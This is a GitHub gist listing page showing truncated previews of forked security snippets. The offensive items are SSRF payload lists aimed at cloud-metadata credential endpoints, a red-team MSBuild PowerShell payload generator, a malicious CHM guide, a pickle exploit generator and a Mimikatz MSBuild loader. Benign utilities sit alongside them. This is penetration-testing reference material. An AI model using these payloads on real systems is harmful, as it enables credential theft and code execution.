Skip to content

Instantly share code, notes, and snippets.

View jbarcia's full-sized avatar

jbarcia

57 followers · 11 following
View GitHub Profile
@jbarcia
jbarcia / server.py
Created March 3, 2021 22:15 — forked from mdonkers/server.py
Simple Python 3 HTTP server for logging all GET and POST requests
#!/usr/bin/env python3
"""
Very simple HTTP server in python for logging requests
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class S(BaseHTTPRequestHandler):
@jbarcia
jbarcia / pyscripter_utils.py
Created July 10, 2019 23:25 — forked from lanmaster53/pyscripter-snippets.py
Burp Python Scripter scripts
from burp import IScanIssue
class CustomIssue(IScanIssue):
def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'):
self.HttpMessages=[BasePair] # list of HTTP Messages
self.HttpService=BasePair.getHttpService() # HTTP Service
self.Url=BasePair.getUrl() # Java URL
self.Confidence = Confidence # "Certain", "Firm" or "Tentative"
self.IssueBackground = IssueBackground # String or None
self.IssueDetail = IssueDetail # String or None
@jbarcia
jbarcia / vmware-workstation-khugepaged-fix.md
Created December 7, 2018 23:55 — forked from 2E0PGS/vmware-workstation-khugepaged-fix.md
Fixing khugepaged CPU usage VMware Workstation

If you run VMware Workstation 11 or above you may encounter high CPU usage from process khugepaged on Ubuntu 15.04+

The fix is to disable transparent hugepages. It seems Ubuntu has it enabled by default.

You can check the current status on your system by running:

cat /sys/kernel/mm/transparent_hugepage/enabled

cat /sys/kernel/mm/transparent_hugepage/defrag

@jbarcia
jbarcia / cloud_metadata.txt
Created November 1, 2018 23:05 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
@jbarcia
jbarcia / cloud_metadata.txt
Created November 1, 2018 23:05 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@jbarcia
jbarcia / generateMSBuildPowershellXML.py
Created August 28, 2018 14:08 — forked from mgeeky/generateMSBuildPowershellXML.py
Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
#!/usr/bin/python3
#
# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#
# Requirements:
# - pefile
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
@jbarcia
jbarcia / Malicious-CHM-Guide.md
Created August 28, 2018 14:02 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@jbarcia
jbarcia / pickle_exploit_generator.py
Created August 8, 2018 03:47 — forked from 0xBADCA7/pickle_exploit_generator.py
Python cPickle/pickle exploit generator
#!/usr/bin/env python
'''
0xBADCA7
Vodka goes down the throat better with pickle.
This script generates pickled object representation. Good for CTFs.
Params: [1] function, [2] parameter, [3] pickle type
Sample run:
@jbarcia
jbarcia / slackmap.sh
Created June 6, 2018 23:51 — forked from jgamblin/slackmap.sh
Script to NMAP a network and Post Differences to Slack
#!/bin/sh
TARGETS="192.168.1.0/24"
OPTIONS="-v -T4 -F -sV"
date=$(date +%Y-%m-%d-%H-%M-%S)
cd /nmap/diffs
nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null
slack(){
curl -F file=@diff-$date -F initial_comment="Internal Port Change Detected" -F channels=#alerts -F token=xxxx-xxxx-xxxx https://slack.com/api/files.upload
}
@jbarcia
jbarcia / Katz.Proj
Created February 4, 2018 12:17
Mimikatz In MSbuild
This file has been truncated, but you can view the full file.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes mimikatz. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>